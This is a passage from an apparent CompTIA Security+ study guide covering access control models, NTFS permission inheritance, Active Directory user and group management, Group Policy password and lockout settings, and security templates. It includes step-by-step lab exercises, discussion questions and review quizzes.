quite different. Like DAC, it uses a list of rules configured in an ACL, but unlike DAC the ACL is stored on a
system or device and controlled by an administrator. Rule-based access control is pretty simple to implement
and is widely used. Common examples include the ACLs used by routers and firewalls, as well as software
whitelists or blacklists.

Exam Objective: CompTIA SY0-501 4.4.2.5


Rules themselves can be static, or they can be dynamic and change with events. For example, an IPS could
add new restrictions to stop an attack it recognizes, and either remove them after a set period or when given
administrator approval. A retail system might be configured to give the assistant manager some additional
permissions when the manager is out: the system detects whether the manager is logged in, and assigns the
assistant's rules accordingly.
Another popular application for rule-based access control is time of day restrictions which allow access to
resources only at certain times. You most commonly see these in parental restrictions on home computers,
where they're used to make sure a child can't stay up playing on the computer after bedtime. Time of day
restrictions can also be useful in the workplace: for instance, you might restrict access to a sensitive resource
after business hours, so that a malicious employee can't "work late" to misuse it when no one is looking.

Attribute-based access control


ABAC is sometimes called a "next generation" access control because of its flexibility. Every time access is
requested, the system evaluates it according to a set of policies defined by an administrator. The policies
themselves are Boolean evaluations against attributes relating to users, resources, action types, or the
environmental details (or context) of the request.

Exam Objective: CompTIA SY0-501 4.4.2.10


For a simple example, imagine someone wants to access highly sensitive product development reports. The
relevant policy might, in common language, be phrased like this:
“Development reports can be read only by managers from the R&D department who are connected on the
trusted local network or over a secure VPN.”
In this case "development" is a resource attribute on the data. "Read" is an action attribute. "Manager" and
"R&D department" are user attributes. The user's current connection type is a contextual attribute.
In practice, ABAC can be as complex and fine-grained as you need it to be. One reason is that you can apply
attributes to almost anything. Contextual attributes are particularly flexible: they can represent time of day,
frequency of transactions, the client used to connect, physical location, or any other way the circumstances of
the request might affect its risk level.
You can also define policies to be as elaborate as you like, limited only by your imagination and the
capabilities of the language used to create them. A single action might be governed by one or several policies,
and policies can be given priorities so that one can override another. This combination of open-ended
attributes and policies allows you to create an ABAC scheme that enforces any of the other policy models, or
that provides complex functionality that other models can't easily match.
One popular ABAC implementation is eXtensible Access Control Markup Language (XACML), an XML-
based standard which defines a policy language, attribute elements, and an overall system architecture to
evaluate and enforce policies.

CompTIA Security+ Exam SY0-501 409


Chapter 9: Access control / Module A: Access control principles

Discussion: Access control models


1. What access control models have you worked with in the past?
Answers may vary, but in general operating systems use DAC and network equipment uses rule-based.
2. Why is it important in MAC that a high security user can't simply save data to a low-security location?
A careless user or trojan horse could place high sensitivity data where anyone can access it.
3. What is the difference between groups on Linux volumes and NTFS volumes?
In Linux a file can belong to only one group. In NTFS it can have separate permissions set for any
number of groups.
4. Why is it so easy to use ABAC to implement other access control models?
Attributes are a flexible enough concept that it's easy to make them correspond to rules, rules, or labels.

Inherited permissions
Setting up any access control system securely requires some work: depending on the model you're using and
how you're approaching configuration, it's easy to leave people unable to do their work or expose sensitive
data to theft. The latter is far worse: if you make permissions too tight you're sure to hear the complaints
sooner or later, but if they're too loose you might not know until after the data breach happens.
Exactly what access controls you'll have to configure and what problems they might have depends on the
software your organization uses, but one place it's easy to screw up is with the DAC used by Windows NTFS
volumes. Even if you configure the file system securely at first, inherited permissions can cause security
problems, especially when objects are moved around.
Inherited permissions are permissions assigned to a parent object that flow down and apply to a child object.
An file or folder inherits permissions from its parent folder when you create it. If you copy or move the
object, what happens to its permissions depends on its destination and whether you're copying or moving it.

1. If the destination is within the same volume, it's important whether you're copying or moving the object.

• Objects moved elsewhere within the same volume keep their original permissions.
• Objects copied elsewhere within the same volume inherit the permissions of the destination folder.

2. If the destination is in a different NTFS volume, the object inherits the permissions of the destination
folder whether you're copying or moving it.
3. If the destination is FAT or another non-NTFS file system, the object loses all NTFS permissions whether
you're copying or moving it.

410 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module A: Access control principles

Inherited permissions during a move operation

Inherited permissions can be NTFS permissions or Share permissions.

Stopping permissions inheritance


In Windows, if you want to assign different permissions to child objects, you must stop permissions
inheritance. In most Windows versions, you break this link by clearing the Include inheritable
permissions from this object's parent check box in Advanced Security Settings. If you
attempt to make a change to a child object's permissions and the boxes are grayed out as shown in the
following figures, this is your clue to stop permission inheritance.

CompTIA Security+ Exam SY0-501 411


Chapter 9: Access control / Module A: Access control principles

1. Right-click the parent folder and choose Properties.


2. On the Permissions tab, click Change Permissions.
3. In the Advanced Security Settings dialog box, clear the Include inheritable permissions
from this object's parent check box.
4. If you want to copy the parent permissions as a starting point to customize the child objects' permissions,
check Replace all child object permissions with inheritable permissions
from this object.
This gives you an editable set of the parent permissions on child objects.
5. Click OK.
6. Click OK again.
Be aware that once you break the link, the child object won't inherit any permission settings from the parent
object unless you specifically force inheritance again by rechecking the Include inheritable
permissions from this object's parent checkbox or propagating permissions.

Propagating permissions
When you change the permissions of a parent folder, you
have the option of applying that change to all sub-folders.
This is referred to as permission propagation. To
propagate folder permissions down a structure where
permissions inheritance has been broken, you use
Advanced Security Settings.

1. Right-click the parent folder and choose


Properties.
2. On the Permissions tab, click Change
Permissions.
3. Select the desired Access Control Entry, and click
Edit.
4. Set the desired permissions and check Apply
these permissions to objects and/or
containers within this container
only.
5. Click OK.
6. Click OK again.
Never assume a permissions change will be inherited or
propagated, always check the child's permissions to verify.

412 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module A: Access control principles

Exercise: Managing NTFS permissions


In this exercise, you'll explore how to view and assign permissions for an NTFS folder.
Do This How & Why

1. On the Windows Server 2012 VM, You'll be their owner, but you can give access permissions to
create folders and files to secure. whoever you like.

a) In Windows Explorer, create a


folder named C:\NTFS lab

b) In NTFS lab, create a Sales


data folder

c) In Sales data, create a text


document named Customer
list.

d) Type anything you want into the


text document, then save and close
it.

2. Give a new group permissions to the


Sales data folder.

a) From the NTFS lab folder, right- The Properties window opens.
click Sales data and click
Properties.

b) On the Security tab, click Edit. Clicking Edit is the easiest way to add permissions. Clicking
Advanced gives you more flexibility.

The Permissions window opens.

c) Click Add The Select window appears.

CompTIA Security+ Exam SY0-501 413


Chapter 9: Access control / Module A: Access control principles

Do This How & Why

d) Type Sales users and click It should be underlined to show that it's valid.
Check Names.

e) Click OK. "Sales users" now appears in the group and user list in the
Permissions window.

f) With Sales users selected, check


the Allow column next to Full
control.

Checking Full control automatically checks all of the others.

g) Click OK. To close the Permissions window. Now, any member of the
Sales users group will have full access to the folder.

3. Add advanced permissions for the You want members of the Marketing user group to be able to
folder. save files to the folder, even though they shouldn't have full
control.

a) On the Security tab, click Advanced.


The Advanced Security Settings window opens.

414 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module A: Access control principles

Do This How & Why

b) Examine the window. It shows detailed permissions for each permission entry:
whether it's an allow or deny permission, the principal it
affects, the access type it gives, where it's inherited from, and
what it applies to. There are also two other tabs: one to view
auditing information, and one to view the effective access for a
given principal or device.

c) Click Add. The Permission Entry window opens. It only shows inherited
permissions from the C:\ drive for now, and you can't edit
anything directly.

d) Click Select a principal.

A Select window appears.

e) Type Marketing users and To add them to the Permission Entry window. You can now
click OK. edit the rest of the window.

f) In the middle section, click Show A larger selection of permissions appear.


advanced permissions.

g) Check Create files/write data. To allow Marketing users to write files to the folder.

h) Examine the top section. This permission entry sets an Allow permission and includes
all subfolders and files. You could change either of these.

i) Click OK. There's now a Special permission type set for Marketing users.

j) Click OK twice. To close the other windows.

The Permission Entry window after setting special permissions

CompTIA Security+ Exam SY0-501 415


Chapter 9: Access control / Module A: Access control principles

Assessment: Access control principles


1. Secure access control models are based on which assumption? Choose the best response.
 Explicit Allow
 Explicit Deny
 Implicit Allow
 Implicit Deny

2. What access control model was popularized by military usage? Choose the best response.
 Discretionary
 Mandatory
 Role-based
 Rule-based

3. What access control model is used by network hardware such as routers?


 Discretionary
 Mandatory
 Role-based
 Rule-based

4. What identifies a security principal in an NTFS file system?


 ACE
 DACL
 LBAC
 SID

5. What group permissions would a Linux file have if its permissions displayed as -rwxrw-r--?

 Read and write


 Read only
 Read, write, and execute
 Write only

6. You want to implement an access control model that lets you easily assign users to a combination of
multiple roles, and also restrict access to some actions based on the time of day and physical location of
the user. Which model is the best fit? Choose the best response.
 ABAC
 DAC
 MAC
 Role-based access control

416 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

Module B: Account management


Provided you're using strong AAA technologies and policies, you still have to configure and enforce them to
keep data secure. The details depend on the software your organization uses, but it's likely going to include
workstation accounts, probably in the Windows environment. Knowing how to manage user privileges and
enforce account policies, especially on multi-user systems and domain-based networks, will go a long way to
securing your overall organization.
You will learn:
 About Active Directory user management
 How to create groups and other objects
 About group policy objects
 How to enforce account policies in Windows

Account types
Any given access control system will have a variety of user accounts, each with its own permissions. While
some access control models allow you to totally customize the permissions of a given account, most have an
assortment of account types that can serve as a starting point.

Exam Objective: CompTIA SY0-501 4.4.1

User Ordinary accounts for authenticated users. These usually have permissions to perform
everyday tasks and access information suitable to the user's job role, but they don't have
access to administrative functions or sensitive data outside the user's specific job role.
Privileged Accounts with access to resources ordinary users do not. Administrator accounts with full
access to a system are the clearest example of a privileged account, but others are as well.
For example, a help desk worker might be able to reset passwords for user accounts, but
not to change more important security settings.
Shared/Generic Accounts not assigned to a specific user, but instead used by multiple people. This is
typically poor security practice since it makes accountability difficult or impossible, but
sometimes it's valuable. A reception desk with frequent staff changes might benefit from a
shared account, or a public kiosk that has limited permissions anyway. Even if it isn't used
by a single person, the account should still be assigned to a person responsible for
maintaining it.
Guest Accounts for guests or visitors who need some limited access to the system. Guest
accounts are much like user accounts but are even more restricted. For example, a guest
account on a network might be able to access the internet but no shared local resources.
Guest accounts may be shared or individual. Temporary employees who need the same
access as permanent ones might be assigned temporary user accounts instead of guest
accounts.
Service An account that is associated with an application or service that needs to interact with the
system. For example, a web server or database management system will have a service
account which can own and access resources just like if it was a user, but independent of
whatever user installed or ran the service.

CompTIA Security+ Exam SY0-501 417


Chapter 9: Access control / Module B: Account management

Active Directory user management


On a Windows domain, account management is centralized. You can create or manage user accounts in the
Active Directory Users and Computers window on an Active Directory domain server.

Active Directory Users and Computers in Windows Server 2012

Active Directory defines several types of objects. Some are security principals, meaning that they can be
authenticated, while some are not. A security principal always has its own SID, so it can be assigned
permissions through ACEs. Objects can also be separated into container objects which can hold other objects,
and leaf objects which cannot.

User A user account that can log onto the domain, along with its associated information. Every
domain has at least an Administrator account and a Guest account. Users are principals
and leaf objects.
Contact Information about a person who is not a domain user, such as name, telephone number,
email, and address. Contacts are leaf objects, but not principals.
Computer A computer that is joined to the domain. Computers are principals and leaf objects.
Printer A pointer to a shared printer. Printers are leaf objects.
Shared folder A pointer to a shared folder on a volume in the domain. The data itself is stored in the
shared folder itself. Shared folders are leaf objects.
Group A container object that can contain user accounts, computers, and other groups. There are
two types of group:
 Security groups are principals that are used to centrally manage rights and
permissions for multiple users, computers, and subgroups.
 Distribution groups are not principals. They are used by email applications such as
Exchange to send email to users in the group.

Organizational A container object that can contain most other objects. They're used to create a logical
Unit (OU) hierarchy to mirror your organization's structure. Unlike security groups, OUs aren't
principals you can assign permissions to. Instead, you can use them to assign group
policies, security policies for OU members that override those of the domain itself.

418 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

Creating Active Directory objects


You can create and manage Active Directory objects in the Active Directory Users and Computers window.
In Windows Server 2012, open Server Manager and click Tools > Active Directory Users and Computers.

Creating new users or groups

 Use the left pane to select existing containers and list their contents.
 To create a new user, click a container in a domain, then click Action > New > User.
• Typically you'll create users in the Users container or an OU you've already created.
• The New Object - User has two screens. The first lets you set user name information, and the second
lets you set a password and password-related options.
• You can also right-click instead of clicking Action.
 To create a new computer, click a container in a domain and click Action > New > Computer. Type the
computer name, then click OK.
 To create a new group, click a container in a domain and click Action > New > Group.
• From the Group type list, choose Security or Distribution.
• From the Group Scope list, choose Domain local, Global, or Universal.
• Only Security groups can be assigned resource permissions.
 To create a new OU, select a domain or existing OU, and click Action > New > Organizational unit.
You can't create OUs within existing containers like Users or Computers.
Note: Deleting Active Directory objects is easy. Restoring them after deleting by mistake can be a pain.
If you want to be able to easily recover objects such as deleted accounts in Windows Server 2008 R2 or
later, you can use the Active Directory Recycle Bin. To enable it, open Active Directory Administrative
Center, and click Enable Recycle Bin. Make sure to do it before you start deleting anything, or you'll
have to use a more complicated process.

Group scopes
One of the main reasons for groups is that it's easier to manage than assigning the same permissions to every
user. For example, if all salespeople need a whole list of resources, you can give all of those permissions to
the Sales group, and then add the news salesperson to the sales group. It's also more secure: if you find out the
Sales group has access to a highly sensitive folder only managers should access, you can just revoke the
whole group's access to the folder without having to worry if you missed somebody.

CompTIA Security+ Exam SY0-501 419


Chapter 9: Access control / Module B: Account management

Another value of groups is that you can put a group inside of a group. You could create a Sales Managers
group that has access to those management-level resources, and make it a member of the Sales group. That
way, if you just add a new manager to the Sales Manager group, they'll inherit the Sales group's permissions
by default.
What this is leading to is that groups have scopes which determine how far they reach within a domain forest.
The scope affects both what kinds of objects can be a part of the group, and also what kinds of group the
group itself can be a member of. In a large network with a lot of domains, especially joined over a WAN,
scopes can be very important. In a smaller network, it's less likely to be critical. If you're going to spend much
time maintaining groups, you should become very familiar with what domain local, global, and universal
groups are and how they interact. Otherwise, you should just keep the following guidelines in mind.
 Use domain local groups when you assign permissions to resources on the local domain.
 Use global groups to organize users sharing similar permissions needs. Don't assign resources
permissions to the global group—add the global group to a domain local group that has permissions.
 Use universal groups to nest global groups from different domains. This way you can give a single user
or group permissions from multiple domains.

Managing objects
You can perform some actions by right-clicking an object to access the context menu. You can edit an object's
full properties by double-clicking it, or right-clicking it and clicking Properties. Some properties are unique
to a single object type, while others, such as group membership, can be found on multiple types.

User properties, and adding users to a group

 Most, but not all, user properties are available in the Properties window.
• Change user info on the General, Address, Telephones, and Organizations tabs.
• Use the Account tab to change logon and password information, lock or unlock accounts, set account
expiration dates, or set logon hours.
• Use the context menu to reset the user's password.
 To add members to a selected group, click Add on the Members tab.
You can add multiple users by separating them with semicolons.
 To add a selected object to a group, click Add to Group in the context menu, or click Add on the
Member Of tab.
Apart from the window title it's much like adding members to a group.

420 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

Assigning special permissions


If you want to let someone manage all your Active Directory tasks you can give them the full administrative
credentials to do it. Other times you might not want to do that: help desk admins need to be able to reset
forgotten passwords, but they don't need to rearrange your AD groups. In these cases, you can delegate certain
Active Directory permissions to users or groups within an OU.

Note: Removing permissions is a bit more complex than adding them, so you still shouldn't do it lightly.

1. Right-click any domain, OU, or folder and click Delegate Control.


2. Click Next, then click Add.
3. In the Select Users, Computers, or Groups window, enter users or groups, then Click OK.
4. Click Next, then check all tasks you want to delegate.
5. Click Next, then Finish.

Exercise: Managing Active Directory objects


In this exercise you'll create and manage Active Directory users, groups, and OUs in the Windows Server
2012 VM.
Do This How & Why

1. In Server Manager, click Tools > The Active Directory Users and Computers console opens.
Active Directory Users and
Computers.

2. Create a new OU. Organizational units are convenient for organizing objects and
assigning group policies.

a) Expand the mwha.local domain, if It displays the containers, or folders, created when AD was
necessary. installed.

CompTIA Security+ Exam SY0-501 421


Chapter 9: Access control / Module B: Account management

Do This How & Why

b) Right click mwha.local and click The New Object - Organizational Unit window opens.
New > Organizational Unit.

c) In the Name field, type IT Protect container from accidental deletion is checked by
Department. default. You'll keep that.

d) Click OK. The new OU appears at the end of the list.

3. Try to delete the IT Department OU. Press Delete with it selected and click Yes. Nothing happens,
since it's protected.

4. Create a new user in the IT


department.

a) Select the IT Department OU. If necessary.

b) Right-click the empty right pane The New Object - User window opens.
and click New > User.

c) Fill out the first screen of the Duane Johnson, logon name Duane.
wizard as follows, then click Next.

d) In the next screen, type P@ssw0rd


into both password boxes.

e) Clear User must change password Note: When you really create secure accounts
at next login, and check Password you shouldn't disable password expiration.
never expires.

f) Click Next, then Finish. Duane Johnson is now listed as a user in the right pane.

422 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

Do This How & Why

5. Create two more IT support users Use the same settings you did for Duane.
named Jeff Hall and John White.

6. Create a new group in the IT You can't assign permissions to an OU. For that, you use
Department OU. groups.

a) Right-click the right pane and click The New Object - Group. By default, it's a Security group
New > Group. with Global scope.

b) In the Group name field, type


Technical Support.

c) Click OK. The new group is created in the OU.

7. Add Duane Anderson to the Technical By assigning them to the group, you can assign privileges they
Support group. need all at once.

a) Right-click Duane Anderson and The Select Groups window appears.


click Add to a group.

b) In the Enter object names field,


type Technical Support.

c) Click Check Names. The name is underlined, verifying that it is valid.

d) Click OK twice. To close the window and confirm the successful addition.

8. Repeat the previous step to add Jeff You don't really need to click Check Names every time, but it
Hall and John White to the Technical helps to make sure you didn't make a mistake.
Support group.

9. Add Duane Anderson to the Domain Don't add the other two. You can add any user or group to any
Admins group. number of other groups.

CompTIA Security+ Exam SY0-501 423


Chapter 9: Access control / Module B: Account management

Do This How & Why

10. Assign special permissions to the All technical support personnel need to be able to perform a
Technical Support group. couple of administrative tasks in Active Directory, but they
don't need full privileges.

a) Right-click mwha.local and click The Delegation of Control Wizard window opens.
Delegate Control.

b) Click Next, then Add. The Select Users, Computers, or Groups window opens. It
looks just like the Select Groups window.

c) Add the Technical Support group. Type Technical Support and click OK. The group is now
listed in the wizard.

d) Click Next. A list of permissions is displayed.

e) Check Reset user passwords and


force password change at next
logon and Join a computer to the
domain.

f) Click Next, then Finish.

11. If time allows, create OUs for the HR


department and Accounting
department, along with at least one
group and user in each one.

12. Close Active Directory Users and


Computers.

Group policies
One of the most valuable tools for establishing security baselines and enforcing user permissions in Windows
is the Group Policy feature. Group policies let you centrally control how users can access Windows features
and resources. For example, you can use Group Policies to enforce password policies, set firewall rules, block
access to folders or network shares, or restrict use of particular desktop features like Task Manager.

Exam Objective: CompTIA SY0-501 4.4.3.2

424 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

The Group Policy Management Editor in Windows Server 2012

In Active Directory, you can set separate group policy objects (GPOs) for sites, domains, or OUs using the
Group Policy Management Editor. Business/Professional versions of Windows also have a more basic Local
Group Policy editor which you can use to edit GPOs for workgroup-based networks or standalone machines.
Without Active Directory you can only configure GPOs for one computer at a time, but you can manually
export settings from one computer and import them on another.
GPOs allow you to change thousands of settings affecting all sorts of windows functions. The settings in a
GPO are divided into two categories.
Computer Configuration settings apply to all computers affected by the GPO, regardless of who are logged in.
Commonly configured categories include:

Scripts (Startup/Shutdown) Scripts that run when the computer first starts or when it shuts down.
Software settings Settings to automatically deploy software to the computer.
Account policies Policies related to user passwords, account lockout, and Kerberos
security settings.
Local policies Policies related to operating system hardening. Includes system
logging, user rights management, and general system security options
such as access to removable media.
Restricted groups Policies allowing you to prevent modification of individual security
groups, for example to prevent users from being added to or removed
from administrator groups.
Windows Firewall and Advanced Windows Firewall rules.
Security
Software restriction policies Policies allowing you to configure what software can run on the
computer.

CompTIA Security+ Exam SY0-501 425


Chapter 9: Access control / Module B: Account management

User Configuration settings apply to all users affected by the GPO, regardless of the computer they use.

Scripts (Logon/Logoff) Scripts that run when a user logs on or logs off.
Folder redirection Settings to redirect user folders to network locations.
Software settings Settings to automatically distribute software to client computers when an affected
user logs on.
Administrative TemplatesSettings to control what features appear in the Start menu, taskbar, Control Panel,
and desktop.

Managing group policies


To manage GPOs in Active Directory, click Tools > Group Policy Management in the Server Manager
window.

Group Policy Management doesn't just allow you to edit existing GPOs, but also to create new ones. This can
make security challenging, since multiple GPOs means a chance for one with weak security settings to
override one with strong settings. When multiple GPOs apply, Windows processes them in the following
order, meaning that each subsequent GPO overrides the one before.

1. Local GPO (set on the current computer)


2. Site GPO
3. Domain GPO
4. Organizational unit GPO
5. Child OU GPO
If multiple GPOs apply on the same level, each has a different link order. Higher link orders process first, and
lower last.

 Click an existing GPO to view its settings along with the scope where it applies, delegation permissions
assigned, and its current status.
 To edit a GPO, right-click it and select Edit.
 To create a new GPO, right-click any domain, site, or OU and click Create a GPO in this domain and
link it here.
 To link an existing GPO, right-click any domain, site, or OU and click Link an existing GPO.

426 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

 To change the link order of multiple GPOs, click any domain, site, or OU and click the Links tab.
 To back up a GPO, right-click it and select Back up.
 To import or export security policies within the Group Policy Editor console, right-click Computer
Configuration > Policies > Windows Settings > Security Settings, and click Import or Export.
On workgroup or standalone machines, only the local GPO exists. There's also no Group Policy
Management window. To directly edit the local GPO, type group policy in the Search box or screen,
then click Edit group policy.

Setting GPO options


To use the Group Policy Editor console, navigate to folders in the left pane, then double-click items in the
right pane to configure them. Some options can only be disabled or enabled, while others have numerical or
other values. The ones you're most likely to configure to enforce security policies are in Computer
Configuration > Policies > Windows Settings > Security Settings.

Exam Objective: CompTIA SY0-501 4.4.3.1, 4.4.3.3, 4.4.3.7, 4.4.3.8, 4.4.3.9, 4.4.3.10

 Navigate to Account Policies > Password Policy to change password requirements.


• Set Minimum password length to set the smallest number of characters a password can have. For
strong security, choose a value between 8 and 12.
• Enable Password must meet complexity requirements to enforce complexity requirements. If it is
enabled, all passwords must be at least six characters, not contain the user's user name, and contain any
three of uppercase letters, lowercase letters, numbers, and special characters.
• Set Maximum password age to set a maximum length of time users can use a password without
changing it. Lower values are more secure, but can be irritating to users.
• Set Enforce password history to specify a number of previous passwords Windows remembers for
the user, in order to prevent users from reusing the same passwords. Higher numbers are more secure
since users can't just cycle through the same couple of passwords.
• Click Minimum password age to set a period users must wait between password changes. This
prevents users from changing passwords several times to cycle through the password history.
• Enable Store passwords using reversible encryption to change how Windows stores passwords. This
method is less secure, so you should only do it if a program requires it.

CompTIA Security+ Exam SY0-501 427


Chapter 9: Access control / Module B: Account management

 Navigate to Account Policies > Account Lockout Policy to lock accounts after repeated failed logon
attempts.
• Set Account lockout threshold to set how many failed attempts are needed to lock the account. The
default of 0 disables lockout. Lower values are more secure, but also make it easier for user error to
cause lockouts.
• If a lockout threshold is set, click Account lockout duration to specify a time in minutes the account
will be locked out. If the value is 0, only an administrator can unlock the account.
• If a lockout threshold is set, click Reset account lockout counter after to specify a time in minutes
for the failed attempts counter to reset. If the lockout duration is non-zero, this value must be less than
or equal to the lockout duration.
 Navigate to Local Policies > Audit policy or Event Log to change security logging options. For
example, you can change how successful or failed logons or privilege escalations are logged, or restrict
access to security logs.
 Navigate to Local Policies > User Rights Assignment or Local Policies > Security Options to
configure more advanced security options. For example, you can restrict what users can log on remotely,
require smart cards for authentication, or specify advanced User Account Control settings.
Note: In general, make sure you know what a specific setting is and what it does before you
change it. Otherwise you might encounter problems.

Managing user accounts


Whether you're using Active Directory or local GPOs, managing user accounts is a three part process.

Exam Objective: CompTIA SY0-501 4.4.2.7, 4.4.3.4, 4.4.3.5, 4.4.3.6

1. Define a user policy with restrictions and best practices.


2. Enforce those policies with operating system controls.
3. Continuously review both security logs and user access settings to verify that enforcements are secure and
users are in compliance.
One easy way to review basic settings for a particular account is with the net user tool. To view any user
on the domain, type net user [username] /domain at the command line.

 Choose user names carefully according to a standard naming convention. Keep the needs of various
elements of security and usability in mind when assigning them:
• To protect against attackers, user names should not be easy to guess just knowing the name or job role
of the account owner.
• For usability, it should be easy for users to remember their own names, and for help desk employees to
find the account of a particular user.
• For auditing purposes, user names should never be changed, and should allow easy filtering for
creating reports.
 Set account policies that encourage strong passwords, without making users prone to constantly lock
themselves out, or worse, start writing their passwords on post-its.
 Allow users to choose their own passwords, and don't ask them to tell you. When you must reset a
password, choose a secure temporary value and require it to be changed on next login.
 Configure a lockout policy that will require an administrator to unlock the account after successive
failed logons.
 Apply credential management using automated tools such as Windows Credential Manager.

428 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

 Where possible, assign permissions to groups rather than individual accounts. It's easier to add or
remove group members than it is to make permissions changes to multiple accounts.
 Where possible, avoid use of generic accounts, such as guest accounts or any others shared by multiple
users. As convenient as they are, they're harder to monitor, individually log, and otherwise keep secure.
 Assign administrators two accounts apiece: an administrator account for tasks which require escalated
privileges, and a normal user account for all other work.
 When giving multiple accounts to a single user, make sure that each account has its own separate
password. Otherwise, someone gaining access to one gains access to all.

Auditing user accounts


Setting up accounts properly is only the first part. You also need to keep track of how they're used, change
settings and permissions when circumstances warrant, and make sure account settings aren't changed without
your knowledge.

Exam Objective: CompTIA SY0-501 4.4.2.3, 4.4.2.4, 4.4.2.6, 4.4.2.8

 Ensure auditing logs are enabled, and review them regularly. The required frequency depends on the
system and its level of sensitivity.
In the Group Policy Management Editor, you can change auditing settings by navigating to Policies >
Windows Settings > Security Settings > Local Policies > Audit Policy.
 Disable accounts that are no longer needed.
• In addition to disabling accounts manually, you can set an automatic expiration date for temporary
accounts on the Account tab of the Properties window.
• Deleting accounts can be a problem if you want them back later, and might violate regulatory
requirements for data retention. Instead, consider moving disabled accounts to an "inactive" OU for
extra security.
 Regularly review and recertify active accounts to make sure they have all permissions they need, but no
more.
 If the auditing and automation tools built into Active Directory or any other account management system
aren't sophisticated enough to meet your needs, look into third-party scripts or tools.

Exercise: Using group policy objects


In this exercise, you'll use GPOs to secure the Active Directory environment.
Do This How & Why

1. In the Windows Server 2012 VM,


view installed group policies.

a) In Server Manager, click Tools > The Group Policy Management console opens.
Group Policy Management.

CompTIA Security+ Exam SY0-501 429


Chapter 9: Access control / Module B: Account management

Do This How & Why

b) On the left, expand Forest: All that's presently there is the Default Domain Controllers
:mwha.local > Domains > Policy and Default Domain Policy.
mwha.local > Group Policy
Objects

2. Edit the default domain policy. You can view it in the management window, but not edit.

a) Right-click Default Domain Policy The Group Policy Management Editor console opens.
and click Edit.

b) In the left pane, navigate to


Computer Configuration >
Policies > Windows Settings >
Security Settings > Account
Policies > Password Policy.

c) Examine the existing settings. According to the present configuration, passwords must be at
least 7 characters and meet complexity requirements. They
must be changed every 42 days, can only be changed once per
day, and a history of 24 passwords are remembered.

3. Change the password policy.

a) Double-click Enforce Password The Properties window opens.


history.

b) Edit the Keep password history


for value to 10.

c) Click OK. To close the Properties window.

d) Edit Maximum password age to Double-click it and edit the value.


90 days.

430 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

Do This How & Why

e) Edit Minimum password length to


10 characters.

4. Add new lockout policies. You'll set a policy to lock users out after enough failed logon
attempts.

a) In the left pane, click Account By default, an attacker can just keep trying to guess the
Lockout Policy. password as long as they like.

b) Define new settings as follows. In the Properties window, you'll have to check Define this
policy setting to enter a value for the first time.

5. Restrict membership to the Domain You want to make sure no one changes the group's
Admins group. membership from Active Directory, even by mistake.

a) On the left, click Restricted


Groups.

b) Right-click the empty right pane The Add Group window appears.
and click Add Group

c) Click Browse. The Select Groups window appears.

d) Type Domain Admins and click To close both windows. You're prompted to set group
OK twice. membership properties.

e) To the "Members of this group Click Add and enter them. You can separate multiple names
section, add Administrator with a semicolon.
and Duane Anderson.

f) Click OK. You won't modify what groups Domain Admins belongs to.
The group and its members appear in the right pane.

CompTIA Security+ Exam SY0-501 431


Chapter 9: Access control / Module B: Account management

Do This How & Why

6. If time allows, restrict the Enterprise


Admins, Schema Admins, and
Administrators groups.

7. Close the Group Policy Management


and Group Policy Management
Editor windows.

The Domain Admins group at the end of the exercise.

Security templates
Group policies allow you to alter almost every aspect of how Windows security works, not just those
regarding user account management. Changing so many settings is a lot of work. The ability to override local
GPOs with Site, Domain, or OU GPOs lets you save a lot of time over configuring a wide range of computers
separately, but across a whole organization it still might mean a lot of work and chances for error.

Exam Objective: CompTIA SY0-501 2.8.2


To further automate the security process, Windows allows you to create security templates, text-based files
which specify a list of security settings. When you want to configure a GPO to meet security baselines, all
you need to do is import the template and its settings will be applied to any computers affected by the GPO.
You can create and manage templates using the Security Templates snap-in for MMC. The template files
themselves are stored by default in C:\Users\[Username]\Documents\Security\Templates.

432 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

A security template opened in Notepad

You can also use security templates as an auditing tool. The Security Configuration and Analysis snap-in
allows you to analyze a computer against a template to see how its effective security settings measure up to a
baseline. Not only can this help you find settings that are configured improperly, it can help you make sure
the combination of GPOs applying to a given computer haven't caused undesirable results.

Using security templates


Creating, applying, and auditing with templates each have a different process.

 To apply an existing template, use the Group Policy Editor console.


a) Navigate to Computer Configuration > Policies > Windows Settings.
b) Right-click Security Settings and choose Import policy.
c) Navigate to the template file.
 To create a new template, use the Microsoft Management Console.

a) If necessary, add the Security Templates snap-in by clicking File > Add/Remove Snap-in.
b) Select the folder where you want to create the template.
c) Click Action > New Template.
d) Name and describe the template, then click OK.
e) Navigate into the template and configure it like you would a GPO.
Any setting left Not defined won't be saved in the template file.
f) When you're finished, right-click the template and click Save.

CompTIA Security+ Exam SY0-501 433


Chapter 9: Access control / Module B: Account management

 To compare a computer's current configuration to a template, use the MMC.

a) If necessary, add the Security Configuration and Analysis snap-in by clicking File > Add/Remove
Snap-in.
b) Right-click Security Configuration and Analysis and click Open Database.
c) Choose a database file and click Open.
To create a new database, type a new file name of your choice.
d) If you're creating a new database, choose a template file to compare to the computer, and click Open.
e) Right-click Security Configuration and Analysis and click Analyze computer now.
f) Browse through the policy tree to compare the template (database) setting against the current computer
settings.
 You can also apply a template from the MMC.
a) Use the Security Configuration and Analysis snap-in to create a database and import a template.
b) Right-click Security Configuration and Analysis and click Configure computer now.

Exercise: Creating a security template


Do This How & Why

1. In Windows Server 2012, open the You want to create a password policy baseline you can use for
Security Templates MMC snap-in. all GPOs in the network. The functionality is in MMC, but you
have to add the right snap-in first.

a) At the Start screen, type MMC

b) Click MMC.

The Microsoft Management Console opens.

c) Click File > Add/Remove Snap-in. A list of available snap-ins appear.

d) Double-click Security Templates. To add it to the selection snap-ins.

e) Add the Security Configuration You'll need this one later.


and Analysis snap-in.

434 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

Do This How & Why

f) Click OK.

The snap-ins are added to the console.

2. Create a new security template.

a) In the navigation pane, expand By default templates are stored in


Security Templates and select the C:\Users\Username\Documents\Security\Templ
